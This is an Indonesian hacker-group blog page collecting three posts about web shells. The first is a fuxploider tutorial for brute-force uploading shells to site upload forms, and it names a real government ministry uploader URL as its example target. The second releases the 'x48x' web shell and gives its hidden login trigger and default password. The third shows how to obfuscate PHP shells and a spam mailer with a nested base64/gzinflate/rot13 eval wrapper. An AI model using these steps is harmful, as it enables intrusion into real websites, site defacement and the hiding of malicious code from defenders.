Tampilkan postingan dengan label Shell. Tampilkan semua postingan
Hai gays kembali lagi bersama gw yukinoshita47 kali ini gw mau share tutorial lagi kali ini tutorial tentang Vulnerability Analysis yang mungkin cocok buat wajah-wajah tukang upload shell kayak lu pade wkwkwkwkwkwk
oke langsung aja
pertama buka terminal
kemudian download tools nya dari github dengan menggunakan perintah
git clone https://github.com/almandin/fuxploider
kemudian tekan enter
kemudian masuk ke dalam direktori tools nya dengan menggunakan perintah
cd fuxploider
kemudian tekan enter
kemudian install dulu python3-pip nya
khusus untuk kali linux versi lama atau versi dibawah tahun 2018
gunakan perintah
apt-get install python3-pip
kemudian tekan enter
---
khusus untuk kali linux 2018 dan yang terbaru
gunakan perintah
apt install python3-pip
kemudian tekan enter
kemudian install dependencies nya dengan menggunakan perintah
pip3 install -r requirements.txt
kemudian tekan enter
setelah selesai install dependencies nya
jalankan tools nya dengan menggunakan perintah
python3 fuxploider.py
kemudian tekan enter
untuk melihat informasi tools gunakan perintah
python3 fuxploider.py -h
kemudian tekan enter
lalu bagaimana cara gunakan tools nya untuk uji coba target nya ?
kita test
cara nya gunakan perintah
python3 fuxploider.py --url http://situstarget.com/letak-file-upload.php --not-regex "wrong file type"
contoh
python3 fuxploider.py --url http://www.itjen.depkes.go.id/public/filemanager/img/ico_dark/uploader.php --not-regex "wrong file type"
kemudian tekan enter maka tool nya akan coba validasi extensi file yang akan di upload
tekan y untuk coba bruteforce upload file shell nya
contoh jika bruteforce upload shell nya berhasil akan muncul seperti gambar dibawah ini
oke cukup sampai disini tutorial kali ini gays kalo ada salah dan kurang dimaklumi aja gays sampai jumpa di tutorial selanjutnya
sekian dan terimakasih
regard
Drs. Yukinoshita47. HAMBA ALLAH YANG MENCARI RIDHO NYA
Garuda Security Hacker Official Team
Official Website Portal : Garuda Security Hacker | Official Website Portal
Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel
Kali Linux : Arbitrary File Upload Vulnerability Scanning Dengan Fuxploider
[SHELL] x48x Web Shell
_Tuan2Fay_ | blog.garudasecurityhacker.org - setelah sebelumnya ane ngerilis mini shell, skrng ane rilis versi anunya (entahlah :v).
pada dasarnya shell ini cuma mengambil function dan tool dari shell yg udah ada sebelumnya,, ini cuma kerjaan ane saat iseng2 aja :v jadi mohon maaf klo tercyduck banyak kekurangannya :( :(
Fitur :
Fitur jg ga banyak2 amat,, ane masukin yg sering di pake sama orang2 aja :vsama ane modif dikit fitur login nya..
Untuk lebih detail nya cek sendiri aja ya :p
Tampilan :
![]() |
| Sebelum Tercyduck |
![]() | |
| Sesudah Tercyduck |
![]() |
| Sesudah Tercyduck dan Login |
Note :
- Buat munculin form loginnya tinggal di tambahin ?ez=login contoh : x48x.php?ez=login
- Default passwordnya : melodynl (bisa di ganti sendiri)
Link : Pasted.co
Garuda Security Hacker Official Team
Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel
[SHELL] x48x Web Shell
Tutorial Encode Script PHP
_Tuan2Fay_ | blog.garudasecurityhacker.org - yoshh apakabar,, sorry pake foto oshi soalnya gw bingung mau pake gambar apalagi biar menarik :v,, sesuai judul gw bakalan ngasih tutorial cara Encode Script PHP, berlaku juga Webshell yg di pake buat depes web,, kenapa di encode ? supaya gak mudah di Recode sama orng,, kalau pun mau ngeRecode ya harus di Decode dlu,, itu pun kalo berhasil. Ok langsung aja eue tutorial nya,,
Bahan Bahan :
1. Script PHP yang mau di Encode
2. Tool buat ngeEncode ( http://scriptencode.net/ )
3. Editor Text (Notepad, Gedit, Bluefish, Nano, dll)
Step by Step :
1. Baca Bismillah dlu kuy,,
2. Buka url Tool buat ngeEncode (link di atas)
3. Buka Script yg mau di encode
di sini saya pake script Mailer spam karya Lyonc (ntar script nya di post ke sini)
4. Copy code nya tapi jagan pake <?php (yg di atas) sama ?> (yang paling bawah) liat gambar biar rada seger
tapi kenapa saya gak bawa $auth_pass = 'md5 hash'; nya ? sengaja biar bisa di ganti2
5. Copy ke tool nya,, terus kita pilih type yg "base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64" aja,, terus langsung klik Encode
<?php
$file = 'isi dengan kode hasil encode';
eval(base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode($file)))))));
?>
save dengan format .php
Note : Kalo Script yang kalian encode ada session loginnya,, password yg ga di encode bisa di taro di atas $file, contoh
$auth_pass = 'md5 hash';
$file = 'hasil encode';
itu pun kalo memang ada atau sengaja ga ikut di encode,
segitu dlu aja yah,, cape ngetik + duduk lama2, mohon maaf klo sulit di pahami atau kurang detail tutorialnya,, kalau mau bertanya bisa komen di bawah atau chat ke FP kami kuy,,
Garuda Security Hacker Official Team
Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel










![[SHELL] x48x Web Shell [SHELL] x48x Web Shell](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilOm6QnJoSSLk-EIDYVK-d4TeBx91R5vpHbAxfTgYFt2GCXtesd4PHEM-QYGTwRqRaE-TsMgiZc_GFN3qCtATZ21yPNzVOWnZp-XrhBmKwemHU5bruVanpUXYdAfTc33HZnVNNOBo40K1S/s400/Screenshot_2017-08-17_10-53-51.png)
![Sebelum Login [SHELL] x48x Web Shell](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhEfUNF6vKXwKx7e_PgA-oflW4RmpgmDrEdd-5NVCC7IeFBVKruqjfCn_aZSqUoj1bwKJANnx88pACJ-S7zcv3QRhLraT8gw_GzRSd7OSxtorkWJknc3I26AF2VdyrLxjlBatMAoYj0qDk/s640/Screenshot_2017-08-17_10-53-29.png)
![Form Login Shell [SHELL] x48x Web Shell](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglP1kjqPCM7e0zA0tGBjXfq1E887K_CPvT8DlRQajI0v49pq2jkkCs95-rRKSoXIvrarSSGbvVyCSibwlb0c-Zg2RYtuEa6OEms29BIEtzsFAJ4hCR3d8Cy2hGZbF1rJIZyuz8GJlED_P3/s640/Screenshot_2017-08-17_10-53-39.png)
![Interface Shell [SHELL] x48x Web Shell](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKgUQ8e8ylKPPodQuR407Vypo8upK2XNZGjs3N1fdaY0uoCjjx0PJR_oq37ak2gP8C4lmHRv-WpNOGGAvmnHQsR5ZnuNQsB_mL0n9c9jY36rZeH0hSDTFQmOjft9ytkwMoGkT8Hv7sayml/s640/Screenshot_2017-08-17_10-53-51.png)


